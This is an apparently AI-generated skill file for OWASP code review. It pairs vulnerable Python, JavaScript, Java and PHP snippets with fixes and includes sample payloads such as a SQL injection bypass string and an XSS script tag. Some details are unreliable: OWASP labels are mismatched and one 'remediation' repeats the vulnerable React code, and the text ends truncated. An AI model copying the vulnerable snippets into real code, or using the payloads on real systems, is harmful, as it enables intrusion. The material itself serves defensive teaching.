OWASP Security Code Review

Description

--- ⚠️ AI-Generated Skill Generated by MFKVault on 2026-05-14. Review before use. Not professional advice. Modify as needed for your use case. --- --- name: OWASP Security Code Review description: Systematically analyze code for OWASP Top 10 vulnerabilities, specifically identifying SQL injection, XSS, CSRF, and insecure direct object references with actionable remediation guidance. --- # OWASP Security Code Review ## When to use this skill Use this skill when reviewing any code that handles user input, database queries, authentication, or sensitive data operations. Activate it during pull request reviews, security audits, or before deploying to production environments. This skill is essential for web applications, APIs, and backend services that interact with databases or render user-controlled content. ## Key behaviors - **Identify SQL injection vectors** by scanning for user input concatenated into SQL queries, detecting missing parameterized statements, and flagging dynamic query construction without proper escaping - **Flag XSS vulnerabilities** by finding unescaped user input rendered in HTML/JavaScript contexts, detecting unsafe use of innerHTML/dangerouslySetInnerHTML, and identifying missing content security policy headers - **Detect CSRF weaknesses** by verifying presence of CSRF tokens in state-changing requests (POST/PUT/DELETE), checking same-site cookie attributes, and confirming token validation on the server side - **Spot insecure direct object references (IDOR)** by analyzing authorization checks before accessing resources by ID, detecting missing permission validation, and identifying predictable or sequential identifiers used without access control - **Provide specific code examples** showing the vulnerable pattern and the secure remediation with actual code snippets in the same language/framework - **Prioritize findings by severity** indicating critical, high, medium, low levels and explaining business impact for each vulnerability - **Reference OWASP documentation** linking findings to specific OWASP Top 10 categories and CWE numbers for easy lookup and remediation guidance ## Examples ### Example 1: SQL Injection in User Login **Vulnerable Code (Python):** ```python username = request.form['username'] password = request.form['password'] query = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'" result = db.execute(query) ``` **Security Issue:** CRITICAL - A1: Injection. User input is directly concatenated into the SQL query. An attacker can input `' OR '1'='1` to bypass authentication. **Remediation:** ```python username = request.form['username'] password = request.form['password'] query = "SELECT * FROM users WHERE username = ? AND password = ?" result = db.execute(query, (username, password)) ``` --- ### Example 2: Cross-Site Scripting in Comment Display **Vulnerable Code (JavaScript/React):** ```javascript function DisplayComment({comment}) { return <div>{comment.text}</div>; } // Later, rendering user input directly const html = `<h1>${userInput}</h1>`; document.getElementById('container').innerHTML = html; ``` **Security Issue:** HIGH - A3: Injection (XSS). User comment text containing `<script>alert('XSS')</script>` will execute in other users' browsers, stealing session cookies or performing actions on their behalf. **Remediation:** ```javascript function DisplayComment({comment}) { return <div>{comment.text}</div>; // React escapes by default } // Or explicitly escape user input import DOMPurify from 'dompurify'; const html = `<h1>${DOMPurify.sanitize(userInput)}</h1>`; document.getElementById('container').innerHTML = html; // Add Content Security Policy header // Content-Security-Policy: default-src 'self'; script-src 'self' ``` --- ### Example 3: Insecure Direct Object Reference in Document Retrieval **Vulnerable Code (Node.js/Express):** ```javascript app.get('/documents/:id', (req, res) => { const docId = req.params.id; const doc = db.query(`SELECT * FROM documents WHERE id = ${docId}`); res.json(doc); }); ``` **Security Issue:** HIGH - A1: Broken Access Control. An authenticated user can access any document by changing the ID in the URL (e.g., `/documents/999`). No verification that the current user owns or has permission to view that document. **Remediation:** ```javascript app.get('/documents/:id', authenticateUser, (req, res) => { const docId = req.params.id; const userId = req.user.id; // Verify ownership before returning document const doc = db.query( 'SELECT * FROM documents WHERE id = ? AND owner_id = ?', [docId, userId] ); if (!doc) { return res.status(403).json({error: 'Access denied'}); } res.json(doc); }); ``` --- ### Example 4: Missing CSRF Token in Form Submission **Vulnerable Code (HTML/PHP):** ```html <form method="POST" action="/transfer-funds"> <input type="text" name="amount" /> <input type="text" name="recipient" /> <button type="submit">Transfer</button> </form> ``` **Security Issue:** MEDIUM - A8: CSRF. A malicious site can trigger this form submission on behalf of an authenticated user, transferring funds without their knowledge or consent. **Remediation:** ```html <form method="POST" action="/transfer-funds"> <input type="hidden" name="csrf_token" value="<?php echo $_SESSION['csrf_token']; ?>" /> <input type="text" name="amount" /> <input type="text" name="recipient" /> <button type="submit">Transfer</button> </form> <!-- Server-side validation (PHP) --> <?php if ($_POST['csrf_token'] !== $_SESSION['csrf_token']) { die('CSRF token validation failed'); } // Process transfer ?> <!-- Also set SameSite cookie attribute --> // Set-Cookie: session=abc123; SameSite=Strict; HttpOnly; Secure ``` --- ### Example 5: Parameterized Queries with Multiple Input Points **Vulnerable Code (Java):** ```java String userId = request.getParameter("user_id"); String status = request.getParameter("status"); String query = "UPDATE users SET status = '" + status + "' WHERE id = " + userId; statement.executeUpdate(query); ``` **Security Issue:** CRITICAL - A1: Injection. Both `userId` and `status` parameters are vulnerable to SQL injection. **Remediation:** ```java String userId = request.getParameter("user_id"); String status = request.getParameter("status"); String query = "UPDATE users SET status = ? WHERE id = ?"; PreparedStatement stmt = connection.prepareStatement(query); stmt.setString(1, status); stmt.setInt(2, Integer.parseInt(userId)); // Validate integer format stmt.executeUpdate(); ``` ## What NOT to do - **Don't assume input validation alone prevents SQL injection** — always use parameterized queries regardless of validation - **Don't trust client-side validation for security** — attackers can bypass JavaScript checks; always validate and authorize server-side - **Don't use innerHTML with user input** — use textContent, innerText, or framework-level escaping instead - **Don't implement custom authentication or CSRF protection** — use established libraries and frameworks (Spring Security, Django CSRF,

Security Status